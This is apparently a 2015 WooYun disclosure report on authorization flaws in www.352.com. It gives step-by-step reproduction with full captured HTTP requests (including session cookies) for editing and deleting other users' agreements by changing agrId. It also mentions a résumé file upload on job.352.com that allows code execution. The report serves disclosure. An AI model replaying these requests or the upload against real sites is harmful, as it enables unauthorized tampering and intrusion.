乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-05: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
RT
1、越权修改注册两个账号,账号A随便创建一份协议
点击查看协议,确定协议号
账号B,创建协议
账号A点击修改,抓包
POST /member/agr/updateAgr.do HTTP/1.1Host: www.352.comProxy-Connection: keep-aliveContent-Length: 100Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.352.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.352.com/member/agr/agrInfo.do?agrId=189090&operate=edit&signState=0Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: cookie_user=b90e6c92c30a4dfcae24f7177bdb406f; cf=#u30; cp=#u30; cln=""; su=#u30; JSESSIONID=A8743E04E6309B8D7171582E27B32E1A.a; at=#u534e#u6587#u6709#u9650#u516c#u53f8; bid=#u38#u36#u31#u38#u33#u38#u31#u35#u30#u36#u30#u34#u33#u35#u39#u38; chknum=#u31; rn=""; mi=""; cr=#u30; Hm_lvt_9ee5e8baadd4fd8000f63f7e91665495=1433422300,1433468689; Hm_lpvt_9ee5e8baadd4fd8000f63f7e91665495=1433471836; Hm_lvt_cd84449f9d5b37a5fc86a6f755298cbc=1433422301; Hm_lpvt_cd84449f9d5b37a5fc86a6f755298cbc=1433471837; WHOSYOURDADDY=1agree.id=189090&signState=0&agree.agrName=2222222222&agree.agrType=101&agree.agrContent=222222222222
修改id成功修改
2、越权删除删除协议,抓包
GET /member/agr/deleteAgr.do?&signState=0&agrId=189091 HTTP/1.1Host: www.352.comProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Referer: http://www.352.com/member/agr/myAgr.do?signState=0Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: cookie_user=b90e6c92c30a4dfcae24f7177bdb406f; cf=#u30; cp=#u30; cln=""; su=#u30; JSESSIONID=A8743E04E6309B8D7171582E27B32E1A.a; at=#u534e#u6587#u6709#u9650#u516c#u53f8; bid=#u38#u36#u31#u38#u33#u38#u31#u35#u30#u36#u30#u34#u33#u35#u39#u38; chknum=#u31; rn=""; mi=""; cr=#u30; Hm_lvt_9ee5e8baadd4fd8000f63f7e91665495=1433422300,1433468689; Hm_lpvt_9ee5e8baadd4fd8000f63f7e91665495=1433472675; Hm_lvt_cd84449f9d5b37a5fc86a6f755298cbc=1433422301; Hm_lpvt_cd84449f9d5b37a5fc86a6f755298cbc=1433472675; WHOSYOURDADDY=1
居然为get请求,修改agrID,成功删除
3、附送job.352.com简历中任意文件上传导致恶意代码执行http://www.352.com/upimages/1433469247878.html
权限控制每次从深圳北站出来都看到融资城大大的牌子!据说有礼物?
危害等级:中
漏洞Rank:10
确认时间:2015-06-05 11:55
感谢你的帮助
暂无